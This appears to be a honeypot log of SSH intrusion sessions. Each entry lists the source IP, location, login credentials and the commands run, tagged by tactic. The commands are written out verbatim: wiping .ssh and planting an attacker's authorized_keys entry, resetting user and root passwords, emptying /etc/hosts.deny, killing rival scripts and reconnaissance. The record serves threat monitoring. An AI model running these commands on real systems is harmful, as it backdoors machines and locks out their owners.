2026-05-21 08:33 EDT Β· as git/asdf, root/kingkong
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "asdf\nDQbyJ0yFwZIi\nDQbyJ0yFwZIi"|passwd|bash
$ Enter new UNIX password:
$ echo "asdf\nDQbyJ0yFwZIi\nDQbyJ0yFwZIi\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:nqI3MgE7dNBC"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 wraith_root_68 (103.118.82.254) β€” Cikarang, Indonesia Β· 1 session Β· 20 cmds
2026-05-23 18:23 EDT Β· as git/asdf
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "asdf\nINThMv3XsEpD\nINThMv3XsEpD"|passwd|bash
$ Enter new UNIX password:
$ echo "asdf\nINThMv3XsEpD\nINThMv3XsEpD\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_68 (152.32.214.55) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 22 cmds
2026-05-23 17:37 EDT Β· as relay/relay, root/Xr123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "relay\nH3VhamG2xQyW\nH3VhamG2xQyW"|passwd|bash
$ Enter new UNIX password:
$ echo "relay\nH3VhamG2xQyW\nH3VhamG2xQyW\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wok_root_20 (220.154.131.139) β€” Qingdao, China Β· 1 session Β· 20 cmds
2026-05-23 17:53 EDT Β· as relay/relay
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "relay\nSmEqL0vq364E\nSmEqL0vq364E"|passwd|bash
$ Enter new UNIX password:
$ echo "relay\nSmEqL0vq364E\nSmEqL0vq364E\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_61 (58.187.119.22) β€” Ho Chi Minh City, Vietnam Β· 1 session Β· 2 cmds
2026-05-23 17:50 EDT Β· as root/qwer123456
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 shadow_sol_2 (171.244.37.97) β€” Hanoi, Vietnam Β· 1 session Β· 2 cmds
2026-05-23 17:45 EDT Β· as root/Welcome2024
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 crumpet_root_4 (144.126.230.158) β€” Slough, United Kingdom Β· 1 session Β· 2 cmds
2026-05-23 17:41 EDT Β· as root/Root123456@
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 phantom_root_69 (41.89.227.164) β€” Meru, Kenya Β· 1 session Β· 1 cmd
2026-05-23 17:16 EDT Β· as tester/12345
file attribute tampering
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
🎭 stroopwafel_root_10 (193.221.200.200) β€” Amsterdam, The Netherlands Β· 1 session Β· 2 cmds
2026-05-23 17:04 EDT Β· as yinghe/yinghe
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 kimchi_root_11 (43.155.239.183) β€” Seoul, South Korea Β· 1 session Β· 2 cmds
2026-05-23 16:59 EDT Β· as root/asdf.1234
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 maple_root_3 (51.222.30.51) β€” Willowdale, Canada Β· 2 sessions Β· 4 cmds
2026-05-23 16:36 EDT Β· as ehsan/123, manuel/manuel
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 frost_root_9 (5.8.51.9) β€” St Petersburg, Russia Β· 1 session Β· 2 cmds
2026-05-23 16:41 EDT Β· as ai/ai
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 wraith_10 (109.206.241.199) β€” Tallin, Estonia Β· 1 session Β· 2 cmds
2026-05-23 16:28 EDT Β· as ehsan/123
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 specter_root_69 (54.38.52.18) β€” Wroclaw, Poland Β· 1 session Β· 20 cmds
2026-05-23 16:23 EDT Β· as ehsan/123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123\nx4jlKM0JtVEX\nx4jlKM0JtVEX"|passwd|bash
$ Enter new UNIX password:
$ echo "123\nx4jlKM0JtVEX\nx4jlKM0JtVEX\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_76 (41.93.32.88) β€” Dar es Salaam, Tanzania Β· 1 session Β· 19 cmds
2026-05-23 15:54 EDT Β· as root/aa123456.
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Oxfc6yPqohyC"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_62 (152.32.131.112) β€” Hong Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-05-23 15:20 EDT Β· as ubuntu/ubuntu123!
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "ubuntu123!\npUHIUHskRJOf\npUHIUHskRJOf"|passwd|bash
$ Enter new UNIX password:
$ echo "ubuntu123!\npUHIUHskRJOf\npUHIUHskRJOf\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_62 (81.192.46.45) β€” Rabat, Morocco Β· 4 sessions Β· 78 cmds
2026-05-22 19:58 EDT Β· as alex/123qweasd, root/Aa135246, root/Asdf1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "123qweasd\ncruRYIioMzUp\ncruRYIioMzUp"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123qweasd\ncruRYIioMzUp\ncruRYIioMzUp\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:wsuh0dC19KMZ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ echo -e "1\nmDtPxPHpWf8W\nmDtPxPHpWf8W"|passwd|bash
$ echo "1\nmDtPxPHpWf8W\nmDtPxPHpWf8W\n"|passwd
$ echo "root:oVTtagwQL0Tu"|chpasswd|bash
🎭 shadow_root_63 (190.220.172.154) β€” Buenos Aires, Argentina Β· 4 sessions Β· 79 cmds
2026-05-08 23:41 EDT Β· as es/es, mysql/654321, odoo17/admin
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "es\nBT62gYR7S0cF\nBT62gYR7S0cF"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "es\nBT62gYR7S0cF\nBT62gYR7S0cF\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo -e "admin\n70EW8XRC7u7s\n70EW8XRC7u7s"|passwd|bash
$ echo "admin\n70EW8XRC7u7s\n70EW8XRC7u7s\n"|passwd
$ echo "root:LMmyYjzgzE9z"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "654321\n96BDyQER2Dh6\n96BDyQER2Dh6"|passwd|bash
$ echo "654321\n96BDyQER2Dh6\n96BDyQER2Dh6\n"|passwd
🎭 cosmo_root_5 (155.212.163.112) β€” Moscow, Russia Β· 3 sessions Β· 58 cmds
2026-05-23 13:59 EDT Β· as root/123456qq@, root/Bl123456, sambauser/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
